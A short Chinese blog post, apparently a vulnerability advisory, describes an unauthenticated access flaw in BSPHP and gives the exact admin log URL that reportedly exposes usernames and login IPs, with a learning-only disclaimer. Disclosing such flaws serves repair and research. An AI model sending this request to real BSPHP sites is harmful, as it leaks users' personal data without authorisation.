BSPHP存在未授权访问

发布于 2021-12-16  858 次阅读


仅用于安全人员学习及修复相关漏洞,未授权渗透是违法行为,切勿用于实际环境,如造成一切后果自行负责!!!

该处泄漏的⽤户名和用户登陆 IP

URL格式如下:

http://127.0.0.1/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&

直接进行访问即可获得如下数据

20211216b1ddq

一个热爱技术的白帽子